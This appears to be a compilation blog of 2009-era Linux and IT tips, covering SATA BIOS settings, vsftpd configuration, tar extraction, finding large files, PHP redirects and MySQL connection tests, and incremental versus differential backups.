Well I fixed it, I just went into the bios and changed the IDE mode to Compatibility instead of Enhanced mode and I've got SuSe 9.0 installed and working now. Only problem I have now is that I can't get the PPP module installed correctly. Using YaSt2 I installed the module, and it is reciding in the /etc/ folder. But when I click Kinternet to connect, the log file says it can't find the PPP module and when I type PPP into the Konsole, it says the kernel doesn't have PPP support... Do I need to recompile the kernel with the PPP module and if so how do I do that? Thx

Reference: http://www.linuxquestions.org/questions/linux-hardware-18/suse-linux-hde-attached-ide-disk-driver-freeze-111048/

Linux SATA Drive is Being Displayed as /dev/hda Instead Of /dev/sda

SkyHi @ Thursday, August 20, 2009
Q. My SATA drive is being displayed as /dev/hda instead of /dev/sda. How do I fix this problem and make sure I get /dev/sda and speed of SATA under Linux operating systems?

A. This is usually related to BIOS settings. Reboot your system and enter into BIOS setup:
Check BIOS settings

Make sure Parallel ATA is "Enabled"

Make sure "Native Mode Operation" is set to "Serial ATA"

Also, set SATA Controller Mode option to "Enhanced"

Save the changes and reboot the server. Now Linux should rename the SATA drive from /dev/hda to /dev/sdb.
Make sure kernel is compiled with SATA support

Usually vendor kernel from Debian/RHEL/Rehat/Fedora comes with SATA enabled. Sometime you may compile custom kernel. If this is case run following command to find out if SATA kernel support is compiled:
grep -i SATA /boot/config-$(uname -r)
Sample output:

CONFIG_SATA_AHCI=m
CONFIG_SATA_INIC162X=m
CONFIG_SATA_MV=m
CONFIG_SATA_NV=m
CONFIG_SATA_PMP=y
CONFIG_SATA_PROMISE=m
CONFIG_SATA_QSTOR=m
CONFIG_SATA_SIL=m
CONFIG_SATA_SIL24=m
CONFIG_SATA_SIS=m
CONFIG_SATA_SVW=m
CONFIG_SATA_SX4=m
CONFIG_SATA_ULI=m
CONFIG_SATA_VIA=m
CONFIG_SATA_VITESSE=m

Make sure ata_piix and libata driver loaded and the disk shows as /dev/sda if DMA is enabled:
lsmod | egrep 'ata_piix|libata'
Sample output:

ata_piix 24580 5
libata 177312 5 pata_acpi,ata_generic,pata_marvell,ata_piix,ahci
scsi_mod 155212 9 ib_iser,iscsi_tcp,libiscsi,scsi_transport_iscsi,sbp2,sr_mod,sd_mod,sg,libata
dock 16656 1 libata


Reference: http://www.cyberciti.biz/faq/linux-sata-drive-displayed-as-devhda/

VSFTPD: Force Upload Only No Downloads

SkyHi @ Thursday, August 20, 2009
Question: How do I configure my VSFTPD ftp server to upload files but disable all file download requests under Debian Linux?

Answer: You can easily configure vsftpd to disallow all download requests. You
VSFTPD ftp server download_enable option

If set to NO, all download requests will give permission denied.
Configure vsftpd to disallow all download requests

Open vsftpd.conf file:
# vi /etc/vsftpd.conf
Set download_enable to NO:
download_enable=NO
Save and close the file. Restart vsftpd ftp server:
# /etc/init.d/vsftpd restart

Tar Extract a Single File(s) From a Large Tarball

SkyHi @ Thursday, August 20, 2009
Q. I've couple of large tarballs such as www.tar and images.tar. Is it possible to extract a single file or a list of files from a large tarball such as images.tar instead of extracting the entire tarball? How do I extract specific files under Linux / UNIX operating systems?

A. GNU tar can be used to extract a single or more files from a tarball. To extract specific archive members, give their exact member names as arguments, as printed by -t option.
Extracting Specific Files

Extract a file called etc/default/sysstat from config.tar.gz tarball:
$ tar -ztvf config.tar.gz
$ tar -zxvf config.tar.gz etc/default/sysstat
$ tar -xvf {tarball.tar} {path/to/file}
Some people prefers following syntax:
tar --extract --file={tarball.tar} {file}
Extract a directory called css from cbz.tar:
$ tar --extract --file=cbz.tar css
Wildcard based extracting

You can also extract those files that match a specific globbing pattern (wildcards). For example, to extract from cbz.tar all files that begin with pic, no matter their directory prefix, you could type:
$ tar -xf cbz.tar --wildcards --no-anchored 'pic*'
To extract all php files, enter:
$ tar -xf cbz.tar --wildcards --no-anchored '*.php'

Where,

* -x: instructs tar to extract files.
* -f: specifies filename / tarball name.
* -v: Verbose (show progress while extracting files).
* -j : filter archive through bzip2, use to decompress .bz2 files.
* -z: filter archive through gzip, use to decompress .gz files.
* --wildcards: instructs tar to treat command line arguments as globbing patterns.
* --no-anchored: informs it that the patterns apply to member names after any / delimiter.


Reference: http://www.cyberciti.biz/faq/linux-unix-extracting-specific-files/

Linux Find Large Files and sort du -h output by size

SkyHi @ Thursday, August 20, 2009
Q. How do I find out all large files in a directory?

A. There is no single command that can be used to list all large files. But, with the help of find command and shell pipes, you can easily list all large files.

Linux List All Large Files

To finds all files over 50,000KB (50MB+) in size and display their names, along with size, use following syntax:

Syntax for RedHat / CentOS / Fedora Linux

find {/path/to/directory/} -type f -size +{size-in-kb}k -exec ls -lh {} \; | awk '{ print $9 ": " $5 }' 

Search or find big files Linux (50MB) in current directory, enter:
$ find . -type f -size +50000k -exec ls -lh {} \; | awk '{ print $9 ": " $5 }' 

Search in my /var/log directory:
# find /var/log -type f -size +100000k -exec ls -lh {} \; | awk '{ print $9 ": " $5 }'

Syntax for Debian / Ubuntu Linux

find {/path/to/directory} -type f -size +{file-size-in-kb}k -exec ls -lh {} \; | awk '{ print $8 ": " $5 }' 

Search in current directory:
$ find . -type f -size +10000k -exec ls -lh {} \; | awk '{ print $8 ": " $5 }'

Sample output:
./.kde/share/apps/akregator/Archive/http___blogs.msdn.com_MainFeed.aspx?Type=AllBlogs.mk4: 91M
./out/out.tar.gz: 828M
./.cache/tracker/file-meta.db: 101M
./ubuntu-8.04-desktop-i386.iso: 700M
./vivek/out/mp3/Eric: 230M
 
Above commands will lists files that are are greater than 10,000 kilobytes in size. To list all files in your home directory tree less than 500 bytes in size, type:
$ find $HOME -size -500b
OR
$ find ~ -size -500b 

To list all files on the system whose size is exactly 20 512-byte blocks, type:
# find / -size 20

ls command: finding the largest files in a directory

You can also use ls command:
$ ls -lS
$ ls -lS | less
$ ls -lS | head +10

ls command: finding the smallest files in a directory

Use ls command as follows:
$ ls -lSr
$ ls -lSr | less
$ ls -lSr | tail -10

You can also use du command as pointed out georges in the comments.


Perl hack: To display large files

Jonathan has contributed following perl code print out stars and the length of the stars show the usage of each folder / file from smallest to largest on the box:

#du -k | sort -n | perl -ne 'if ( /^(\d+)\s+(.*$)/){$l=log($1+.1);$m=int($l/log(1024)); printf  ("%6.1f\t%s\t%25s  %s\n",($1/(2**(10*$m))),(("K","M","G","T","P")[$m]),"*"x (1.5*$l),$2);}'




996.0 K ********** ./3dgolddenhouse.com/html/gallery/wood_b_slides
1.0 M ********** ./3dgolddenhouse.com/html/gallery/draperies_slides
1.1 M ********** ./3dgolddenhouse.com/html/gallery/roller_shades_slide
1.1 M ********** ./3dgolddenhouse.com/html/gallery/wood_shutters_slides
1.2 M ********** ./stellmnao.com/html/cchis
1.2 M ********** ./stellmnao.com/html
1.2 M ********** ./stellmnao.com
1.3 M ********** ./3dgolddenhouse.com/html/gallery/cellular_slides
1.3 M ********** ./3dgolddenhouse.com/html/gallery/faux_wood_slides
1.3 M ********** ./heretogohome.net/html/bo/app/webroot
1.5 M ********** ./3dgolddenhouse.com/html/gallery/sheer_shades_slides
1.6 M *********** ./3dgolddenhouse.com/html/gallery/vinyl_shutters_slides
1.7 M *********** ./heretogohome.net/html/bo/cake/libs
1.9 M *********** ./heretogohome.net/html/bo/app
2.8 M *********** ./heretogohome.net/html/bo/cake
3.1 M ************ ./3dgolddenhouse.com/html/images
3.1 M ************ ./3dgolddenhouse.com/html/gallery/aluminum_slides
3.2 M ************ ./3dgolddenhouse.com/html/gallery/roman_shades_slides
5.3 M ************ ./heretogohome.net/html/bo
5.3 M ************ ./heretogohome.net/html
5.3 M ************ ./heretogohome.net
18.0 M ************** ./3dgolddenhouse.com/html/gallery
21.3 M ************** ./3dgolddenhouse.com/html
21.3 M ************** ./3dgolddenhouse.com
27.8 M *************** .

Linux tip: du --max-depth=1
du --max-depth=1 | sort -n | awk 'BEGIN {OFMT = "%.0f"} {print $1/1024,"MB", $2}' > diskusage.txt




Reference: http://www.cyberciti.biz/faq/find-large-files-linux/
http://serverfault.com/questions/62411/how-can-i-sort-du-h-output-by-size

Domain Redirection Using a PHP Script

SkyHi @ Thursday, August 20, 2009
Q. How do I redirect my domain name using a php server side scripting under Apache web server?

A. Under PHP you need to use header() to send a raw HTTP header.

If you want to redirect a domain to some other URL, you can use the PHP script as below

header("Location: http://example.com/");
exit();
?>

PHP Test mysql connection

SkyHi @ Thursday, August 20, 2009

<?php
$hostname="db2.example.com";
$user = "user";
$password = "password";
$link = mysql_connect("$hostname","$user","$password");
if (!$link) { die('Could not connect to MySQL: ' . mysql_error()); }
echo 'Connection OK';

$dbname = "dbai";
$selected = mysql_select_db("$dbname", $link) or die("could not open db". mysql_error());



mysql_close($link);

?>

Incremental vs Differential Backups. What's the strategic difference?

SkyHi @ Thursday, August 20, 2009
Incremental backups reset the archive bit and differential backups do not.

I use a differential backup when installing something that is complex and multi-step. I can create a differential backup after each step and essentially save my work up to that point. If anything goes horribly wrong, I can restore up to the last working step and not have my changes skipped by my regular incremental backup after I am finished.



The main benefit of a differential is you only need to use the last differential and last full backup to recover all of your data in event of a loss ect.

if you use incremental your backups are a lot quicker as it only backs up any changes since the last incremental, differential backs up everything that has changed since the last full backup so they are larger.

so say you lost all your data, if you used incremental you would need to restore the last full backup and every incremental backup since then.

If you used differential, you would restore the last full backup and the last differential backup.

It all depends on how much storage and how much time you have to do the backups.

Hope this helps.

Andy


Reference: http://community.spiceworks.com/topic/30516










What's the difference between differential and incremental backups (and why should I care)?

Both differential and incremental backups are "smart" backups that save time and disk space by only backing up changed files. But they differ significantly in how they do it, and how useful the result is.

A full backup created from within Windows, of course, backs up all the files in a partition or on a disk by copying all disk sectors with data to the backup image file. Creating a full backup for unknown or damaged filesystems Acronis True Image copies all sectors to the image file, whether or not the sector contains data. This is the simplest form of backup, but it is also the most time-consuming, space-intensive and the least flexible.

Typically full backups are only done once a week and are part of an overall backup plan. Sometimes a full backup is done after a major change of the data on the disk, such as an operating system upgrade or software install. The relatively long intervals between backups mean that if something goes wrong, a lot of data is going to be lost. That's why it is wise to back up data between full backups.

Most of the information on a computer changes very slowly or not at all. This includes the applications themselves, the operating system and even most of the user data. Typically, only a small percentage of the information in a partition or disk changes on a daily, or even a weekly, basis. For that reason, it makes sense only to back up the data that has changed on a daily basis. This is the basis of sophisticated backup strategies.

Differential backups were the next step in the evolution of backup strategies. A differential backup backs up only the files that changed since the last full back. For example, suppose you do a full backup on Sunday. On Monday you back up only the files that changed since Sunday, on Tuesday you back up only the files that changed since Sunday, and so on until the next full backup. Differential backups are quicker than full backups because so much less data is being backed up. But the amount of data being backed up grows with each differential backup until the next full back up. Differential backups are more flexible than full backups, but still unwieldy to do more than about once a day, especially as the next full backup approaches.

Incremental backups also back up only the changed data, but they only back up the data that has changed since the last backup — be it a full or incremental backup. They are sometimes called "differential incremental backups," while differential backups are sometimes called "cumulative incremental backups." Confused yet? Don't be.

If you do an incremental backup on Tuesday, you only back up the data that changed since the incremental backup on Monday. The result is a much smaller, faster backup. The characteristic of incremental backups is the shorter the time interval between backups, the less data to be backed up. In fact, with sophisticated backup software like Acronis True Image, the backups are so small and so fast you can actually back up every hour, or even more frequently, depending on the work you're doing and how important it is to have current backups.

While incremental backups give much greater flexibility and granularity (time between backups), they have the reputation for taking longer to restore because the backup has to be reconstituted from the last full backup and all the incremental backups since. Acronis True Image uses special snapshot technology to rebuild the full image quickly for restoration. This makes incremental backups much more practical for the average enterprise.

Reference: http://www.acronis.com/resource/solutions/backup/2005/incremental-backups.html